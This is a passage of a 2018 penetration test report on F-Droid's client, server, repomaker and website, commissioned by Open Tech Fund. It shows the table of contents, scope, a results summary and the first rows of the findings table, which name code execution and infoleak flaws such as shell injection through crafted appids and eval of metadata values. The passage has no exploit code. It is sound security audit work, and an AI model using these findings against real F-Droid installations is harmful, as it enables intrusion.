style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f32-bluetoothserver-java-insecure-rfcomm-socket-used-for-bluetooth-connection">OTF-018 &#8212; Use of Insecure Communication Mechanism - BluetoothServer.java</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f32-bluetoothserver-java-insecure-rfcomm-socket-used-for-bluetooth-connection"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f35-potential-sql-injection"><span>4.1.19</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f35-potential-sql-injection">OTF-019 &#8212; Potential SQL Injection</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f35-potential-sql-injection"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f41-app-uses-data-from-clipboard"><span>4.1.20</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f41-app-uses-data-from-clipboard">OTF-020 &#8212; Unverified URI redirect</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f41-app-uses-data-from-clipboard"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f43-file-deleted-unconditionally"><span>4.1.21</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f43-file-deleted-unconditionally">OTF-021 &#8212; File Deleted Unconditionally</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f43-file-deleted-unconditionally"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f44-secure-temp-file-usage-recommended"><span>4.1.22</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f44-secure-temp-file-usage-recommended">OTF-022 &#8212; Secure Temp File Usage Recommended</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f44-secure-temp-file-usage-recommended"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f46--fdroidclient-app-is-signed-with-sha1withrsa-known-to-have-collision-issues"><span>4.1.23</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f46--fdroidclient-app-is-signed-with-sha1withrsa-known-to-have-collision-issues">OTF-023 &#8212; (fdroidclient) App Is Signed With `SHA1withRSA`, Known to Have Collision Issues</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f46--fdroidclient-app-is-signed-with-sha1withrsa-known-to-have-collision-issues"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f47--fdroidclient-raw-sql-query-executions"><span>4.1.24</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f47--fdroidclient-raw-sql-query-executions">OTF-024 &#8212; (fdroidclient) Raw SQL Query Executions</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f47--fdroidclient-raw-sql-query-executions"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f48--fdroid-client-snooping-in-between-clients-in-nearby-swap-"><span>4.1.25</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f48--fdroid-client-snooping-in-between-clients-in-nearby-swap-">OTF-025 &#8212; (fdroid Client) Snooping in Between Clients in "Nearby Swap"</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f48--fdroid-client-snooping-in-between-clients-in-nearby-swap-"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f52--fdroid-client-insecure-implementation-of-ssl"><span>4.1.26</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f52--fdroid-client-insecure-implementation-of-ssl">OTF-026 &#8212; (fdroid Client) Insecure Implementation of SSL</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f52--fdroid-client-insecure-implementation-of-ssl"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f53--privilege-extension-app-is-signed-with-sha1withrsa-known-to-have-collision-issues"><span>4.1.27</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f53--privilege-extension-app-is-signed-with-sha1withrsa-known-to-have-collision-issues">OTF-027 &#8212; (Privilege Extension) Mobile application package signed with weak algorithm `SHA1withRSA`</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f53--privilege-extension-app-is-signed-with-sha1withrsa-known-to-have-collision-issues"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f1-tabnabbing-in-repomaker"><span>4.1.28</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f1-tabnabbing-in-repomaker">OTF-028 &#8212; Tabnabbing in Repomaker</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f1-tabnabbing-in-repomaker"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f9-repomaker-apk-_def_get_type-allows-for-mime-type-mismatches"><span>4.1.29</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f9-repomaker-apk-_def_get_type-allows-for-mime-type-mismatches">OTF-029 &#8212; Repomaker:apk:_def_get_type Allows for Mime Type Mismatches</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f9-repomaker-apk-_def_get_type-allows-for-mime-type-mismatches"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f10-unsafe-html-rendering-of-arbitrary-input"><span>4.1.30</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f10-unsafe-html-rendering-of-arbitrary-input">OTF-030 &#8212; Unsafe HTML Rendering of Arbitrary Input</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f10-unsafe-html-rendering-of-arbitrary-input"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f16-dangerous-deserialization-using-python-pickle-in-fdroidserver-update-py"><span>4.1.31</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f16-dangerous-deserialization-using-python-pickle-in-fdroidserver-update-py">OTF-031 &#8212; Dangerous Deserialization Using Python Pickle in Fdroidserver:update.py</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f16-dangerous-deserialization-using-python-pickle-in-fdroidserver-update-py"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f19-starting-a-process-with-a-partial-executable-path"><span>4.1.32</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f19-starting-a-process-with-a-partial-executable-path">OTF-032 &#8212; Starting a Process With a Partial Executable Path</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f19-starting-a-process-with-a-partial-executable-path"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f24-maliciously-crafted-appid-code-injection-in-fdroidserver-build-py"><span>4.1.33</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f24-maliciously-crafted-appid-code-injection-in-fdroidserver-build-py">OTF-033 &#8212; Maliciously Crafted Appid Code Injection in Fdroidserver Build.py</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f24-maliciously-crafted-appid-code-injection-in-fdroidserver-build-py"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f34-bluetootheserver-java-file-in-response-without-size-of-type-check"><span>4.1.34</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f34-bluetootheserver-java-file-in-response-without-size-of-type-check">OTF-034 &#8212; Missing file type and size validation</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f34-bluetootheserver-java-file-in-response-without-size-of-type-check"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f36-no-mechanism-to-remove-root-ca-keys"><span>4.1.35</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f36-no-mechanism-to-remove-root-ca-keys">OTF-035 &#8212; Hardcoded root CA keys</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f36-no-mechanism-to-remove-root-ca-keys"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f37-use-of-rot13-and-base64-encoding"><span>4.1.36</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f37-use-of-rot13-and-base64-encoding">OTF-036 &#8212; Use of weak methods for data protection</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f37-use-of-rot13-and-base64-encoding"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f38-untrusted-external-links"><span>4.1.37</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f38-untrusted-external-links">OTF-037 &#8212; Untrusted External Links</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f38-untrusted-external-links"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f42-stronger-regular-expression-recommended"><span>4.1.38</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f42-stronger-regular-expression-recommended">OTF-038 &#8212; Weak pattern matching filter</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f42-stronger-regular-expression-recommended"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#nonFindings"><span>4.2</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#nonFindings">Non-Findings</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#nonFindings"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f50--fdroid-client-exploiting-the-local-web-server-of-nearby-swap-to-navigate-directories"><span>4.2.1</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f50--fdroid-client-exploiting-the-local-web-server-of-nearby-swap-to-navigate-directories">NF-001 &#8212; (fdroid Client) Exploiting the Local Web Server of "Nearby Swap" to Navigate Directories</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f50--fdroid-client-exploiting-the-local-web-server-of-nearby-swap-to-navigate-directories"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f51--fdroid-client-exploiting-exported-activities-and-broadcasts"><span>4.2.2</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f51--fdroid-client-exploiting-exported-activities-and-broadcasts">NF-002 &#8212; (fdroid Client) Exploiting Exported Activities and Broadcasts</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f51--fdroid-client-exploiting-exported-activities-and-broadcasts"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f54--privilege-extension-static-analysis-of-apk"><span>4.2.3</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f54--privilege-extension-static-analysis-of-apk">NF-003 &#8212; (Privilege Extension) Static Analysis of APK</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f54--privilege-extension-static-analysis-of-apk"><span>&#8226;</span></a></div></td></tr>
   <tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#futurework"><span>5</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#futurework">Future Work</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right; font-weight: bold; margin-top: 4mm;"><a href="#futurework"><span>&#8226;</span></a></div></td></tr>
   <tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#conclusion"><span>6</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#conclusion">Conclusion</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right; font-weight: bold; margin-top: 4mm;"><a href="#conclusion"><span>&#8226;</span></a></div></td></tr>
   <tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#testteam"><span> Appendix&nbsp;1</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#testteam">Testing team</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right; font-weight: bold; margin-top: 4mm;"><a href="#testteam"><span>&#8226;</span></a></div></td></tr>
</tbody></table></div></div></div><br><hr><div><div style="margin-right: 2cm"><table style="border-bottom-color: black; border-bottom-width: 2mm; border-bottom-style: solid; margin-left: 0cm; margin-right: 0cm;" valign="top"><tbody><tr><td style="margin-left: 0cm; margin-right: 0cm; background-color: #e2632a; text-align: center;" valign="top"><div style="color: white; font-family: Helvetica; font-size: 16pt; margin-top: 0.4cm; margin-bottom: 0.4cm;">Penetration Test Report</div></td></tr><tr><td style="margin-left: 0cm; margin-right: 0cm; background-color: white; padding-left: 0.5cm; padding-top: 0.7cm; padding-bottom: 0.4cm;" valign="top"><div style="color: black; font-family: Helvetica; font-size: 16pt; font-weight: normal;">Open Tech Fund</div></td></tr><tr><td style="margin-left: 0cm; margin-right: 0cm; background-color: white; padding-left: 0.5cm; padding-top: 0.5cm; padding-bottom: 1.2cm;" valign="top"><div><div>V 1.0</div><div>Diemen, August 29th, 2018</div><div>Confidential</div></div></td></tr></tbody></table></div></div></div><br><br><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div></div></div><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div><a name="executiveSummary"></a><div style="margin-bottom: 1.3cm;">
      <div style="color: #e2632a; font-family: Helvetica; font-size: 16pt; margin-bottom: 0.6cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>1</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">Executive Summary</div></td></tr></table></div>
      <a name="introduction"></a><div style="margin-bottom: 1.3cm;">
         <div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>1.1</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">Introduction</div></td></tr></table></div>
         <div style="margin-bottom: 5pt; line-height: 6mm;">Between February 12, 2018 and April 8, 2018, Radically Open Security B.V. carried out a code audit for Open Tech Fund
         </div>
         <div style="margin-bottom: 1.3cm; line-height: 6mm;">This report contains our findings as well as detailed explanations of exactly
                        how ROS performed the code audit.</div>
      </div>
      <a name="scope"></a><div style="margin-bottom: 1.3cm;">
         <div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>1.2</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">Scope of work</div></td></tr></table></div>
         <div style="margin-bottom: 5pt; line-height: 6mm;">The scope of the penetration test was limited to the following target:</div>
         <div style="margin-left: 2mm;"><table width="100%"><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div><span>&#8226;</span></div></td><td width="7.56">&nbsp;</td><td valign="top"><div>F-droid Client</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div><span>&#8226;</span></div></td><td width="7.56">&nbsp;</td><td valign="top"><div>F-droid Privileged Extension</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div><span>&#8226;</span></div></td><td width="7.56">&nbsp;</td><td valign="top"><div>F-droid Repomaker</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div><span>&#8226;</span></div></td><td width="7.56">&nbsp;</td><td valign="top"><div>F-droid Server</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div><span>&#8226;</span></div></td><td width="7.56">&nbsp;</td><td valign="top"><div>F-droid Website</div></td></tr></table></div>
      </div>
      <a name="objectives"></a><div style="margin-bottom: 1.3cm;">
         <div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>1.3</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">Project objectives</div></td></tr></table></div>
         <div style="margin-bottom: 1.3cm; line-height: 6mm;">The project objective was to identify vulnerabilities in Fdroid web application and mobile app. This was to be achieved by performing code audit and pen-test of Fdroid app hosting server application, the Fdroid app for browsing and downloading apps from Fdroid repositories, and code to create and register app repositories as part of Fdroid community.</div>
      </div>
      <a name="timeline"></a><div style="margin-bottom: 1.3cm;">
         <div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>1.4</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">Timeline</div></td></tr></table></div>
         <div style="margin-bottom: 1.3cm; line-height: 6mm;">The Security Audit took place between Febuary 12 and April 8, 2018.</div>
      </div>
      <a name="resultsinanutshell"></a><div style="margin-bottom: 1.3cm;">
  <div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>1.5</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">Results In A Nutshell</div></td></tr></table></div>
  <div style="margin-bottom: 5pt; line-height: 6mm;">In all, we report 10 high impact, 18 moderate impact and 10 low impact issues during the course of the code audit and pen-test.</div>
  <div style="margin-bottom: 5pt; line-height: 6mm;">Some limited impact issues have been found in the code audit of repomaker. Some high impact code execution and infoleak issues have been found in fdroidserver which allow an adversary to run code in the host running fdroidserver and the users browsers visiting fdroid.org.
  </div>
  <div style="margin-bottom: 5pt; line-height: 6mm;">
      Potentially significant impact issues have been found during the Fdroid client code review, ranging from unverified trust through use of TOFU to insecure communication leading to MiTM.
  </div>
  <div style="margin-bottom: 1.3cm; line-height: 6mm;">
      During the pen-test, the request-swap functionality of the app potentially allows mailicious requests/messages to be accepted, and also redirect users to malicious sites. In addition, weaknesses in cryptography usage and potential for MiTM was discovered.
  </div>
</div>
      <a name="findingSummary"></a><div style="margin-bottom: 1.3cm;">
         <div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>1.6</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">Summary of Findings</div></td></tr></table></div>
         <div><table style="margin-bottom: 1.3cm; border-color: #444444; border-width: 1pt; border-style: solid;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>ID</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Type</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Description</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Threat level</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><a name="summaryTableThreatLevelHigh"></a><div><a href="#f8-evasion-of-bleach-sanitizer-in-repomaker" style="color: #e2632a;">OTF-001</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
  The user input sanitizer bleach can be circumvented and thus code
  can be injected into browsers which display the descriptions of apps.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>High</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f14-shell-code-injection-via-malicious-appids-into-fdroidserver" style="color: #e2632a;">OTF-002</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
  It is possible to craft malicious APK files which contain an appid which is being used as a shell injection, allowing arbitrary code execution.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>High</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f23-code-injection-in-fdroidserver-metadata-yaml-parsing" style="color: #e2632a;">OTF-003</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Maliciously crafted metadata can be used to run arbitrary code on the fdroidserver host.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>High</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f25-infoleak-in-fdroidserver-checkupdates-py" style="color: #e2632a;">OTF-004</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Infoleak</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Attacker controlled URLs can be used first to run a regular expression on a local file, then depending on a match of the expression a second URL can be accessed or not. This can be used to leak information from the fdroid host.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>High</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f26-code-injection-in-fdroidserver-checkupdates-py-through-eval--ed-user-supplied-data" style="color: #e2632a;">OTF-005</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>The value of VercodeOperation supplied in the metadata of the app by the adversary is eval-ed in the fdroidserver script checkupdates.py.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>High</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f27-code-injection-via-malicious-appid-in-fdroidserver-build-py" style="color: #e2632a;">OTF-006</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>A maliciously crafted appid can be used to inject code in fdroidserver build.py:1274
